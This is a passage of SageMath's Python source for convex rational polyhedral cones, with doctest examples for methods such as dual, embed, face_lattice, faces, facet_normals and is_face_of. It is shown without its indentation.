....: rays=[(1,0,0), (0,1,0), (-1,0,0), (0,0,1)])
sage: cone = fan.generating_cone(0)
sage: len(cone.adjacent())
0
Since now ``cone`` has smaller dimension than ``fan``, it and its
adjacent cones must be facets of a bigger one, but since ``cone``
in this example is generating, it is not contained in any other.
"""
L = self._ambient._face_lattice_function()
adjacent = set()
facets = self.facets()
superfaces = self.facet_of()
if superfaces:
for superface in superfaces:
for facet in facets:
adjacent.update(L.open_interval(facet, superface))
if adjacent:
adjacent.remove(L(self))
return self._sort_faces(adjacent)
elif self.dim() == self._ambient.dim():
# Special treatment relevant for fans
for facet in facets:
adjacent.update(facet.facet_of())
if adjacent:
adjacent.remove(self)
return self._sort_faces(adjacent)
else:
return ()
def ambient(self):
r"""
Return the ambient structure of ``self``.
OUTPUT:
- cone or fan containing ``self`` as a face.
EXAMPLES::
sage: cone = Cone([(1,2,3), (4,6,5), (9,8,7)])
sage: cone.ambient()
3-d cone in 3-d lattice N
sage: cone.ambient() is cone
True
sage: face = cone.faces(1)[0]
sage: face
1-d face of 3-d cone in 3-d lattice N
sage: face.ambient()
3-d cone in 3-d lattice N
sage: face.ambient() is cone
True
"""
return self._ambient
def ambient_ray_indices(self):
r"""
Return indices of rays of the ambient structure generating ``self``.
OUTPUT:
- increasing :class:`tuple` of integers.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.ambient_ray_indices()
(0, 1)
sage: quadrant.facets()[1].ambient_ray_indices()
(1,)
"""
return self._ambient_ray_indices
def contains(self, *args):
r"""
Check if a given point is contained in ``self``.
INPUT:
- anything. An attempt will be made to convert all arguments into a
single element of the ambient space of ``self``. If it fails,
``False`` will be returned.
OUTPUT:
- ``True`` if the given point is contained in ``self``, ``False``
otherwise.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.contains(c.lattice()(1,0))
True
sage: c.contains((1,0))
True
sage: c.contains((1,1))
True
sage: c.contains(1,1)
True
sage: c.contains((-1,0))
False
sage: c.contains(c.dual_lattice()(1,0)) #random output (warning)
False
sage: c.contains(c.dual_lattice()(1,0))
False
sage: c.contains(1)
False
sage: c.contains(1/2, sqrt(3))
True
sage: c.contains(-1/2, sqrt(3))
False
"""
point = flatten(args)
if len(point) == 1:
point = point[0]
return self._contains(point)
def dual(self):
r"""
Return the dual cone of ``self``.
OUTPUT:
- :class:`cone <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: cone = Cone([(1,0), (-1,3)])
sage: cone.dual().rays()
M(0, 1),
M(3, 1)
in 2-d lattice M
Now let's look at a more complicated case::
sage: cone = Cone([(-2,-1,2), (4,1,0), (-4,-1,-5), (4,1,5)])
sage: cone.is_strictly_convex()
False
sage: cone.dim()
3
sage: cone.dual().rays()
M(7, -18, -2),
M(1, -4, 0)
in 3-d lattice M
sage: cone.dual().dual() is cone
True
We correctly handle the degenerate cases::
sage: N = ToricLattice(2)
sage: Cone([], lattice=N).dual().rays() # empty cone
M( 1, 0),
M(-1, 0),
M( 0, 1),
M( 0, -1)
in 2-d lattice M
sage: Cone([(1,0)], lattice=N).dual().rays() # ray in 2d
M(1, 0),
M(0, 1),
M(0, -1)
in 2-d lattice M
sage: Cone([(1,0),(-1,0)], lattice=N).dual().rays() # line in 2d
M(0, 1),
M(0, -1)
in 2-d lattice M
sage: Cone([(1,0),(0,1)], lattice=N).dual().rays() # strictly convex cone
M(0, 1),
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0),(0,1)], lattice=N).dual().rays() # half space
M(0, 1)
in 2-d lattice M
sage: Cone([(1,0),(0,1),(-1,-1)], lattice=N).dual().rays() # whole space
Empty collection
in 2-d lattice M
TESTS:
The dual cone of a (random) dual cone is the original cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.dual().dual() is K
True
"""
if "_dual" not in self.__dict__:
rays = list(self.facet_normals())
for ray in self.orthogonal_sublattice().gens():
rays.append(ray)
rays.append(-ray)
self._dual = Cone(rays, lattice=self.dual_lattice(), check=False)
self._dual._dual = self
return self._dual
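# Illustrative note on the construction above (comments only): the dual cone is
# generated by the facet normals together with +/- the generators of the
# orthogonal sublattice, which takes care of cones of less than full dimension.
# For the single ray Cone([(1,0)]) in a 2-d lattice the facet normal is M(1, 0)
# and the orthogonal sublattice is generated by M(0, 1), giving the dual rays
# M(1, 0), M(0, 1), M(0, -1) listed in the degenerate-case examples above.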
def embed(self, cone):
r"""
Return the cone equivalent to the given one, but sitting in ``self`` as
a face.
You may need to use this method before calling methods of ``cone`` that
depend on the ambient structure, such as
:meth:`~sage.geometry.cone.ConvexRationalPolyhedralCone.ambient_ray_indices`
or
:meth:`~sage.geometry.cone.ConvexRationalPolyhedralCone.facet_of`. The
cone returned by this method will have ``self`` as ambient. If ``cone``
does not represent a valid cone of ``self``, a ``ValueError`` exception
is raised.
.. NOTE::
This method is very quick if ``self`` is already the ambient
structure of ``cone``, so you can use it without extra checks or a
performance hit even if ``cone`` is likely to sit in ``self`` but
in principle may not.
INPUT:
- ``cone`` -- a :class:`cone
<sage.geometry.cone.ConvexRationalPolyhedralCone>`.
OUTPUT:
- a :class:`cone <sage.geometry.cone.ConvexRationalPolyhedralCone>`,
equivalent to ``cone`` but sitting inside ``self``.
EXAMPLES:
Let's take a 3-d cone on 4 rays::
sage: c = Cone([(1,0,1), (0,1,1), (-1,0,1), (0,-1,1)])
Then any ray generates a 1-d face of this cone, but if you construct
such a face directly, it will not "sit" inside the cone::
sage: ray = Cone([(0,-1,1)])
sage: ray
1-d cone in 3-d lattice N
sage: ray.ambient_ray_indices()
(0,)
sage: ray.adjacent()
()
sage: ray.ambient()
1-d cone in 3-d lattice N
If we want to operate with this ray as a face of the cone, we need to
embed it first::
sage: e_ray = c.embed(ray)
sage: e_ray
1-d face of 3-d cone in 3-d lattice N
sage: e_ray.rays()
N(0, -1, 1)
in 3-d lattice N
sage: e_ray is ray
False
sage: e_ray.is_equivalent(ray)
True
sage: e_ray.ambient_ray_indices()
(3,)
sage: e_ray.adjacent()
(1-d face of 3-d cone in 3-d lattice N,
1-d face of 3-d cone in 3-d lattice N)
sage: e_ray.ambient()
3-d cone in 3-d lattice N
Not every cone can be embedded into a fixed ambient cone::
sage: c.embed(Cone([(0,0,1)]))
Traceback (most recent call last):
...
ValueError: 1-d cone in 3-d lattice N is not a face
of 3-d cone in 3-d lattice N!
sage: c.embed(Cone([(1,0,1), (-1,0,1)]))
Traceback (most recent call last):
...
ValueError: 2-d cone in 3-d lattice N is not a face
of 3-d cone in 3-d lattice N!
"""
assert is_Cone(cone)
if cone.ambient() is self:
return cone
if self.is_strictly_convex():
rays = self.rays()
try:
ray_indices = tuple(sorted(rays.index(ray)
for ray in cone.rays()))
for face in self.faces(cone.dim()):
if face.ambient_ray_indices() == ray_indices:
return face
except ValueError:
pass
else:
# We cannot use the trick with indices since rays are not unique.
for face in self.faces(cone.dim()):
if cone.is_equivalent(face):
return face
# If we are here, then either ValueError was raised or we went through
# all faces and didn't find the matching one.
raise ValueError("%s is not a face of %s!" % (cone, self))
def face_lattice(self):
r"""
Return the face lattice of ``self``.
This lattice will have the origin as the bottom (we do not include the
empty set as a face) and this cone itself as the top.
OUTPUT:
- :class:`finite poset <sage.combinat.posets.posets.FinitePoset>` of
:class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES:
Let's take a look at the face lattice of the first quadrant::
sage: quadrant = Cone([(1,0), (0,1)])
sage: L = quadrant.face_lattice()
sage: L
Finite lattice containing 4 elements with distinguished linear extension
To see all faces arranged by dimension, you can do this::
sage: for level in L.level_sets(): print(level)
[0-d face of 2-d cone in 2-d lattice N]
[1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N]
[2-d cone in 2-d lattice N]
For a particular face you can look at its actual rays... ::
sage: face = L.level_sets()[1][0]
sage: face.rays()
N(1, 0)
in 2-d lattice N
... or you can see the index of the ray of the original cone that
corresponds to the above one::
sage: face.ambient_ray_indices()
(0,)
sage: quadrant.ray(0)
N(1, 0)
An alternative to extracting faces from the face lattice is to use
:meth:`faces` method::
sage: face is quadrant.faces(dim=1)[0]
True
The advantage of working with the face lattice directly is that you
can (relatively easily) get faces that are related to the given one::
sage: face = L.level_sets()[1][0]
sage: D = L.hasse_diagram()
sage: sorted(D.neighbors(face))
[0-d face of 2-d cone in 2-d lattice N,
2-d cone in 2-d lattice N]
However, you can achieve some of this functionality using
:meth:`facets`, :meth:`facet_of`, and :meth:`adjacent` methods::
sage: face = quadrant.faces(1)[0]
sage: face
1-d face of 2-d cone in 2-d lattice N
sage: face.rays()
N(1, 0)
in 2-d lattice N
sage: face.facets()
(0-d face of 2-d cone in 2-d lattice N,)
sage: face.facet_of()
(2-d cone in 2-d lattice N,)
sage: face.adjacent()
(1-d face of 2-d cone in 2-d lattice N,)
sage: face.adjacent()[0].rays()
N(0, 1)
in 2-d lattice N
Note that if ``cone`` is a face of ``supercone``, then the face
lattice of ``cone`` consists of (appropriate) faces of ``supercone``::
sage: supercone = Cone([(1,2,3,4), (5,6,7,8),
....: (1,2,4,8), (1,3,9,7)])
sage: supercone.face_lattice()
Finite lattice containing 16 elements with distinguished linear extension
sage: supercone.face_lattice().top()
4-d cone in 4-d lattice N
sage: cone = supercone.facets()[0]
sage: cone
3-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice()
Finite poset containing 8 elements with distinguished linear extension
sage: cone.face_lattice().bottom()
0-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice().top()
3-d face of 4-d cone in 4-d lattice N
sage: cone.face_lattice().top() == cone
True
TESTS::
sage: C1 = Cone([(0,1)])
sage: C2 = Cone([(0,1)])
sage: C1 == C2
True
sage: C1 is C2
False
C1 and C2 are equal, but not identical. We currently want them
to have non-identical face lattices, even if the faces
themselves are equal (see :trac:`10998`)::
sage: C1.face_lattice() is C2.face_lattice()
False
sage: C1.facets()[0]
0-d face of 1-d cone in 2-d lattice N
sage: C2.facets()[0]
0-d face of 1-d cone in 2-d lattice N
sage: C1.facets()[0].ambient() is C1
True
sage: C2.facets()[0].ambient() is C1
False
sage: C2.facets()[0].ambient() is C2
True
"""
if "_face_lattice" not in self.__dict__:
if self._ambient is self:
# We need to compute face lattice on our own. To accommodate
# non-strictly convex cones we split rays (or rather their
# indices) into those in the linear subspace and others, which
# we refer to as atoms.
S = self.linear_subspace()
subspace_rays = []
atom_to_ray = []
for i, ray in enumerate(self):
# This try...except tests whether ray lies in S;
# "ray in S" does not work because ray lies in a
# toric lattice and S is a "plain" vector space,
# and there is only a conversion (no coercion)
# between them as of Trac ticket #10513.
try:
S(ray)
subspace_rays.append(i)
except (TypeError, ValueError):
atom_to_ray.append(i)
def ConeFace(atoms, facets):
if facets:
rays = sorted([atom_to_ray[a] for a in atoms]
+ subspace_rays)
face = ConvexRationalPolyhedralCone(
ambient=self, ambient_ray_indices=rays)
# It may be nice if this functionality were exposed;
# however, it makes sense only for cones which are
# thought of as faces of a single cone, not of a fan.
face._containing_cone_facets = facets
return face
else:
return self
# Obtain a modified version of the incidence matrix,
# with rows corresponding to rays in subspace removed.
mod_incidence_matrix = self.incidence_matrix()[atom_to_ray]
atom_to_facets = [row.nonzero_positions()
for row in mod_incidence_matrix.rows()]
facet_to_atoms = [column.nonzero_positions()
for column in mod_incidence_matrix.columns()]
self._face_lattice = lattice_from_incidences(
atom_to_facets, facet_to_atoms, ConeFace,
key = id(self))
else:
# Get face lattice as a sublattice of the ambient one
allowed_indices = frozenset(self._ambient_ray_indices)
L = DiGraph()
origin = \
self._ambient._face_lattice_function().bottom()
L.add_vertex(0) # In case it is the only one
dfaces = [origin]
faces = [origin]
face_to_index = {origin:0}
next_index = 1
next_d = 1 # Dimension of faces to be considered next.
while next_d < self.dim():
ndfaces = []
for face in dfaces:
face_index = face_to_index[face]
for new_face in face.facet_of():
if not allowed_indices.issuperset(
new_face._ambient_ray_indices):
continue
if new_face in ndfaces:
new_face_index = face_to_index[new_face]
else:
ndfaces.append(new_face)
face_to_index[new_face] = next_index
new_face_index = next_index
next_index += 1
L.add_edge(face_index, new_face_index)
faces.extend(ndfaces)
dfaces = ndfaces
next_d += 1
if self.dim() > 0:
# Last level is very easy to build, so we do it separately
# even though the above cycle could do it too.
faces.append(self)
for face in dfaces:
L.add_edge(face_to_index[face], next_index)
D = {i:f for i,f in enumerate(faces)}
L.relabel(D)
self._face_lattice = FinitePoset(L, faces, key = id(self))
return self._face_lattice
# Internally we use this name for a uniform behaviour of cones and fans.
_face_lattice_function = face_lattice
def faces(self, dim=None, codim=None):
r"""
Return faces of ``self`` of specified (co)dimension.
INPUT:
- ``dim`` -- integer, dimension of the requested faces;
- ``codim`` -- integer, codimension of the requested faces.
.. NOTE::
You can specify at most one parameter. If you don't give any, then
all faces will be returned.
OUTPUT:
- if either ``dim`` or ``codim`` is given, the output will be a
:class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`;
- if neither ``dim`` nor ``codim`` is given, the output will be the
:class:`tuple` of tuples as above, giving faces of all existing
dimensions. If you care about inclusion relations between faces,
consider using :meth:`face_lattice` or :meth:`adjacent`,
:meth:`facet_of`, and :meth:`facets`.
EXAMPLES:
Let's take a look at the faces of the first quadrant::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.faces()
((0-d face of 2-d cone in 2-d lattice N,),
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N),
(2-d cone in 2-d lattice N,))
sage: quadrant.faces(dim=1)
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N)
sage: face = quadrant.faces(dim=1)[0]
Now you can look at the actual rays of this face... ::
sage: face.rays()
N(1, 0)
in 2-d lattice N
... or you can see indices of the rays of the original cone that
correspond to the above ray::
sage: face.ambient_ray_indices()
(0,)
sage: quadrant.ray(0)
N(1, 0)
Note that it is OK to ask for faces of too small or too high dimension::
sage: quadrant.faces(-1)
()
sage: quadrant.faces(3)
()
In the case of non-strictly convex cones even faces of small
non-negative dimension may be missing::
sage: halfplane = Cone([(1,0), (0,1), (-1,0)])
sage: halfplane.faces(0)
()
sage: halfplane.faces()
((1-d face of 2-d cone in 2-d lattice N,),
(2-d cone in 2-d lattice N,))
sage: plane = Cone([(1,0), (0,1), (-1,-1)])
sage: plane.faces(1)
()
sage: plane.faces()
((2-d cone in 2-d lattice N,),)
TESTS:
Now we check that "general" cones whose dimension is smaller than the
dimension of the ambient space work as expected (see :trac:`9188`)::
sage: c = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3)])
sage: c.faces()
((0-d face of 3-d cone in 4-d lattice N,),
(1-d face of 3-d cone in 4-d lattice N,
1-d face of 3-d cone in 4-d lattice N,
1-d face of 3-d cone in 4-d lattice N),
(2-d face of 3-d cone in 4-d lattice N,
2-d face of 3-d cone in 4-d lattice N,
2-d face of 3-d cone in 4-d lattice N),
(3-d cone in 4-d lattice N,))
We also ensure that a call to this function does not break
:meth:`facets` method (see :trac:`9780`)::
sage: cone = toric_varieties.dP8().fan().generating_cone(0)
sage: cone
2-d cone of Rational polyhedral fan in 2-d lattice N
sage: for f in cone.facets(): print(f.rays())
N(1, 1)
in 2-d lattice N
N(0, 1)
in 2-d lattice N
sage: len(cone.faces())
3
sage: for f in cone.facets(): print(f.rays())
N(1, 1)
in 2-d lattice N
N(0, 1)
in 2-d lattice N
"""
if dim is not None and codim is not None:
raise ValueError(
"dimension and codimension cannot be specified together!")
dim = self.dim() - codim if codim is not None else dim
if "_faces" not in self.__dict__:
self._faces = tuple(map(self._sort_faces,
self.face_lattice().level_sets()))
if dim is None:
return self._faces
else:
lsd = self.linear_subspace().dimension()
return self._faces[dim - lsd] if lsd <= dim <= self.dim() else ()
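# Note on the index shift above (comments only): ``self._faces`` is indexed
# from the dimension of the linear subspace upward, since a non-strictly convex
# cone has no faces of smaller dimension.  For the half-plane
# Cone([(1,0), (0,1), (-1,0)]) the linear subspace is 1-dimensional, so
# ``faces(0)`` returns the empty tuple, as in the EXAMPLES block.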
@cached_method
def facet_normals(self):
r"""
Return inward normals to facets of ``self``.
.. NOTE::
#. For a not full-dimensional cone, facet normals will specify
hyperplanes whose intersections with the space spanned by
``self`` give facets of ``self``.
#. For a not strictly convex cone, facet normals will be orthogonal
to the linear subspace of ``self``, i.e. they will always be
elements of the dual cone of ``self``.
#. The order of normals is random, but consistent with
:meth:`facets`.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`.
If the ambient :meth:`~IntegralRayCollection.lattice` of ``self`` is a
:class:`toric lattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, the facet normals
will be elements of the dual lattice. If it is a general lattice (like
``ZZ^n``) that does not have a ``dual()`` method, the facet normals
will be returned as integral vectors.
EXAMPLES::
sage: cone = Cone([(1,0), (-1,3)])
sage: cone.facet_normals()
M(0, 1),
M(3, 1)
in 2-d lattice M
Now let's look at a more complicated case::
sage: cone = Cone([(-2,-1,2), (4,1,0), (-4,-1,-5), (4,1,5)])
sage: cone.is_strictly_convex()
False
sage: cone.dim()
3
sage: cone.linear_subspace().dimension()
1
sage: lsg = (QQ^3)(cone.linear_subspace().gen(0)); lsg
(1, 1/4, 5/4)
sage: cone.facet_normals()
M(7, -18, -2),
M(1, -4, 0)
in 3-d lattice M
sage: [lsg*normal for normal in cone.facet_normals()]
[0, 0]
A lattice that does not have a ``dual()`` method::
sage: Cone([(1,1),(0,1)], lattice=ZZ^2).facet_normals()
(-1, 1),
( 1, 0)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
We correctly handle the degenerate cases::
sage: N = ToricLattice(2)
sage: Cone([], lattice=N).facet_normals() # empty cone
Empty collection
in 2-d lattice M
sage: Cone([(1,0)], lattice=N).facet_normals() # ray in 2d
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0)], lattice=N).facet_normals() # line in 2d
Empty collection
in 2-d lattice M
sage: Cone([(1,0),(0,1)], lattice=N).facet_normals() # strictly convex cone
M(0, 1),
M(1, 0)
in 2-d lattice M
sage: Cone([(1,0),(-1,0),(0,1)], lattice=N).facet_normals() # half space
M(0, 1)
in 2-d lattice M
sage: Cone([(1,0),(0,1),(-1,-1)], lattice=N).facet_normals() # whole space
Empty collection
in 2-d lattice M
"""
cone = self._PPL_cone()
normals = []
for c in cone.minimized_constraints():
assert c.inhomogeneous_term() == 0
if c.is_inequality():
normals.append(c.coefficients())
M = self.dual_lattice()
normals = tuple(map(M, normals))
for n in normals:
n.set_immutable()
if len(normals) > 1:
# Sort normals if they are rays
if self.dim() == 2 and normals[0]*self.ray(0) != 0:
normals = (normals[1], normals[0])
else:
try: # or if we have combinatorial faces already
facets = self._faces[-2]
normals = set(normals)
sorted_normals = [None] * len(normals)
for i, f in enumerate(facets):
for n in normals:
if n*f.rays() == 0:
sorted_normals[i] = n
normals.remove(n)
break
normals = tuple(sorted_normals)
except AttributeError:
pass
return PointCollection(normals, M)
@cached_method
def facet_of(self):
r"""
Return *cones* of the ambient face lattice having ``self`` as a facet.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.facet_of()
()
sage: one_face = octant.faces(1)[0]
sage: len(one_face.facet_of())
2
sage: one_face.facet_of()[1]
2-d face of 3-d cone in 3-d lattice N
While a fan is the top element of its own cone lattice, which is a
variant of a face lattice, we do not refer to cones as its facets::
sage: fan = Fan([octant])
sage: fan.generating_cone(0).facet_of()
()
Subcones of generating cones work as before::
sage: one_cone = fan(1)[0]
sage: len(one_cone.facet_of())
2
"""
L = self._ambient._face_lattice_function()
H = L.hasse_diagram()
return self._sort_faces(
f for f in H.neighbors_out(L(self)) if is_Cone(f))
def facets(self):
r"""
Return facets (faces of codimension 1) of ``self``.
OUTPUT:
- :class:`tuple` of :class:`cones <ConvexRationalPolyhedralCone>`.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.facets()
(1-d face of 2-d cone in 2-d lattice N,
1-d face of 2-d cone in 2-d lattice N)
"""
return self.faces(codim=1)
@cached_method
def incidence_matrix(self):
r"""
Return the incidence matrix.
.. NOTE::
The columns correspond to facets/facet normals
in the order of :meth:`facet_normals`; the rows
correspond to the rays in the order of
:meth:`rays`.
EXAMPLES::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.incidence_matrix()
[0 1 1]
[1 0 1]
[1 1 0]
sage: halfspace = Cone([(1,0,0), (0,1,0), (-1,-1,0), (0,0,1)])
sage: halfspace.incidence_matrix()
[0]
[1]
[1]
[1]
[1]
TESTS::
sage: halfspace.incidence_matrix().is_immutable()
True
Check that the base ring is ``ZZ``, see :trac:`29840`::
sage: halfspace.incidence_matrix().base_ring()
Integer Ring
"""
normals = self.facet_normals()
incidence_matrix = matrix(ZZ, self.nrays(),
len(normals), 0)
for Hindex, normal in enumerate(self.facet_normals()):
for Vindex, ray in enumerate(self.rays()):
if normal*ray == 0:
incidence_matrix[Vindex, Hindex] = 1
incidence_matrix.set_immutable()
return incidence_matrix
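# Reading the matrix above (comments only): entry (i, j) is 1 exactly when ray
# i pairs to zero with facet normal j, i.e. when ray i lies on facet j.  In the
# octant example each ray e_i lies on the two facets whose normals are the
# other two coordinate functionals, which gives the matrix with zeros on the
# diagonal and ones elsewhere shown in the EXAMPLES block.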
def intersection(self, other):
r"""
Compute the intersection of two cones.
INPUT:
- ``other`` -- :class:`cone <ConvexRationalPolyhedralCone>`.
OUTPUT:
- :class:`cone <ConvexRationalPolyhedralCone>`.
Raises ``ValueError`` if the ambient space dimensions are not
compatible.
EXAMPLES::
sage: cone1 = Cone([(1,0), (-1, 3)])
sage: cone2 = Cone([(-1,0), (2, 5)])
sage: cone1.intersection(cone2).rays()
N(-1, 3),
N( 2, 5)
in 2-d lattice N
It is OK to intersect cones living in sublattices of the same ambient
lattice::
sage: N = cone1.lattice()
sage: Ns = N.submodule([(1,1)])
sage: cone3 = Cone([(1,1)], lattice=Ns)
sage: I = cone1.intersection(cone3)
sage: I.rays()
N(1, 1)
in Sublattice <N(1, 1)>
sage: I.lattice()
Sublattice <N(1, 1)>
But you cannot intersect cones from incompatible lattices without
explicit conversion::
sage: cone1.intersection(cone1.dual())
Traceback (most recent call last):
...
ValueError: 2-d lattice N and 2-d lattice M
have different ambient lattices!
sage: cone1.intersection(Cone(cone1.dual().rays(), N)).rays()
N(3, 1),
N(0, 1)
in 2-d lattice N
"""
if self._ambient is other._ambient:
# Cones of the same ambient cone or fan intersect nicely/quickly.
# Can we maybe even return an element of the cone lattice?..
# But currently it can be done only for strictly convex cones.
ambient_ray_indices = tuple(r for r in self._ambient_ray_indices
if r in other._ambient_ray_indices)
# type(self) allows this code to work nicely for derived classes,
# although it forces all of them to accept such input
return type(self)(ambient=self._ambient,
ambient_ray_indices=ambient_ray_indices)
# Generic (slow) intersection, returning a generic cone.
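# The PPL representation makes this easy: concatenating the two
# constraint systems cuts out the set-theoretic intersection, and the
# result is read back as a cone over the intersection of the two
# (sub)lattices.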
p = C_Polyhedron(self._PPL_cone())
p.add_constraints(other._PPL_cone().constraints())
return _Cone_from_PPL(p, self.lattice().intersection(other.lattice()))
def is_equivalent(self, other):
r"""
Check if ``self`` is "mathematically" the same as ``other``.
INPUT:
- ``other`` -- cone.
OUTPUT:
- ``True`` if ``self`` and ``other`` define the same cones as sets of
points in the same lattice, ``False`` otherwise.
There are three different equivalences between cones `C_1` and `C_2`
in the same lattice:
#. They have the same generating rays in the same order.
This is tested by ``C1 == C2``.
#. They describe the same sets of points.
This is tested by ``C1.is_equivalent(C2)``.
#. They are in the same orbit of `GL(n,\ZZ)` (and, therefore,
correspond to isomorphic affine toric varieties).
This is tested by ``C1.is_isomorphic(C2)``.
EXAMPLES::
sage: cone1 = Cone([(1,0), (-1, 3)])
sage: cone2 = Cone([(-1,3), (1, 0)])
sage: cone1.rays()
N( 1, 0),
N(-1, 3)
in 2-d lattice N
sage: cone2.rays()
N(-1, 3),
N( 1, 0)
in 2-d lattice N
sage: cone1 == cone2
False
sage: cone1.is_equivalent(cone2)
True
TESTS:
A random cone is equivalent to itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.is_equivalent(K)
True
"""
if self is other:
return True
# TODO: Next check is pointless if cones and fans are made to be unique
if self.ambient() is other.ambient() and self.is_strictly_convex():
return self.ambient_ray_indices() == other.ambient_ray_indices()
if self.lattice() != other.lattice():
return False
return self._PPL_cone() == other._PPL_cone()
def is_face_of(self, cone):
r"""
Check if ``self`` forms a face of another ``cone``.
INPUT:
- ``cone`` -- cone.
OUTPUT:
- ``True`` if ``self`` is a face of ``cone``, ``False`` otherwise.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: cone1 = Cone([(1,0)])
sage: cone2 = Cone([(1,2)])
sage: quadrant.is_face_of(quadrant)
True
sage: cone1.is_face_of(quadrant)
True
sage: cone2.is_face_of(quadrant)
False
Being a face means more than just saturating a facet
inequality::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: cone = Cone([(2,1,0),(1,2,0)])
sage: cone.is_face_of(octant)
False
TESTS:
Any cone is a face of itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.is_face_of(K)
True
"""
if self.lattice() != cone.lattice():
return False
if self._ambient is cone._ambient:
# Cones are always faces of their ambient structure, so it suffices
# to check that the rays of ``self`` are among the rays of ``cone``.
return self.rays().set().issubset(cone.rays().set())
if self.is_equivalent(cone):
return True
# Obviously False case
if self.dim() >= cone.dim(): # if == and face, we return True above
return False
# It remains to test whether self is a proper face of cone:
# 1) self must saturate at least one facet inequality
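#    Every equality constraint of ``cone`` cuts out its linear span, so a
#    face has to saturate it as well.  Among the inequalities we collect
#    those saturated by ``self``; their common zero set cuts out the
#    smallest face of ``cone`` containing ``self``.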
saturates = Poly_Con_Relation.saturates()
supporting_hyperplanes = Constraint_System()
for c in cone._PPL_cone().minimized_constraints():
rel = self._PPL_cone().relation_with(c)
if c.is_equality() and not rel.implies(saturates):
return False
if c.is_inequality() and rel.implies(saturates):
c_eq = (Linear_Expression(c.coefficients(),
c.inhomogeneous_term()) == 0)
supporting_hyperplanes.insert(c_eq)
if supporting_hyperplanes.empty():
return False
# 2) self must be a whole face, and not just a part of one
cone_face = C_Polyhedron(cone._PPL_cone())
cone_face.add_constraints(supporting_hyperplanes)
return cone_face == self._PPL_cone()
def is_isomorphic(self, other):
r"""
Check if ``self`` is in the same `GL(n, \ZZ)`-orbit as ``other``.
INPUT:
- ``other`` -- cone.
OUTPUT:
- ``True`` if ``self`` and ``other`` are in the same
`GL(n, \ZZ)`-orbit, ``False`` otherwise.
There are three different equivalences between cones `C_1` and `C_2`
in the same lattice:
#. They have the same generating rays in the same order.
This is tested by ``C1 == C2``.
#. They describe the same sets of points.
This is tested by ``C1.is_equivalent(C2)``.
#. They are in the same orbit of `GL(n,\ZZ)` (and, therefore,
correspond to isomorphic affine toric varieties).
This is tested by ``C1.is_isomorphic(C2)``.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 3)])
sage: m = matrix(ZZ, [(1, -5), (-1, 4)]) # a GL(2,ZZ)-matrix
sage: cone2 = Cone( m*r for r in cone1.rays() )
sage: cone1.is_isomorphic(cone2)
True
sage: cone1 = Cone([(1,0), (0, 3)])
sage: cone2 = Cone([(-1,3), (1, 0)])
sage: cone1.is_isomorphic(cone2)
False
TESTS::
sage: from sage.geometry.cone import classify_cone_2d
sage: classify_cone_2d(*cone1.rays())
(1, 0)
sage: classify_cone_2d(*cone2.rays())
(3, 2)
We check that :trac:`18613` is fixed::
sage: K = cones.trivial(0)
sage: K.is_isomorphic(K)
True
sage: K = cones.trivial(1)
sage: K.is_isomorphic(K)
True
sage: K = cones.trivial(2)
sage: K.is_isomorphic(K)
True
A random (strictly convex) cone is isomorphic to itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6, strictly_convex=True)
sage: K.is_isomorphic(K)
True
"""
if self.is_strictly_convex() and other.is_strictly_convex():
from sage.geometry.fan import Fan
return Fan([self]).is_isomorphic(Fan([other]))
if self.is_strictly_convex() ^ other.is_strictly_convex():
return False
raise NotImplementedError("isomorphism check for not strictly convex "
"cones is not implemented")
def is_simplicial(self):
r"""
Check if ``self`` is simplicial.
A cone is called **simplicial** if primitive vectors along its
generating rays form a part of a *rational* basis of the ambient
space.
OUTPUT:
- ``True`` if ``self`` is simplicial, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 3)])
sage: cone2 = Cone([(1,0), (0, 3), (-1,-1)])
sage: cone1.is_simplicial()
True
sage: cone2.is_simplicial()
False
"""
return self.nrays() == self.dim()
@cached_method
def is_smooth(self):
r"""
Check if ``self`` is smooth.
A cone is called **smooth** if primitive vectors along its
generating rays form a part of an *integral* basis of the
ambient space. Equivalently, they generate the whole lattice
on the linear subspace spanned by the rays.
OUTPUT:
- ``True`` if ``self`` is smooth, ``False`` otherwise.
EXAMPLES::
sage: cone1 = Cone([(1,0), (0, 1)])
sage: cone2 = Cone([(1,0), (-1, 3)])
sage: cone1.is_smooth()
True
sage: cone2.is_smooth()
False
The following cones are the same up to an `SL(2,\ZZ)`
coordinate transformation::
sage: Cone([(1,0,0), (2,1,-1)]).is_smooth()
True
sage: Cone([(1,0,0), (2,1,1)]).is_smooth()
True
sage: Cone([(1,0,0), (2,1,2)]).is_smooth()
True
"""
if not self.is_simplicial():
return False
return self.rays().matrix().elementary_divisors() == [1] * self.nrays()
def is_empty(self):
"""
Return whether ``self`` is the empty set.
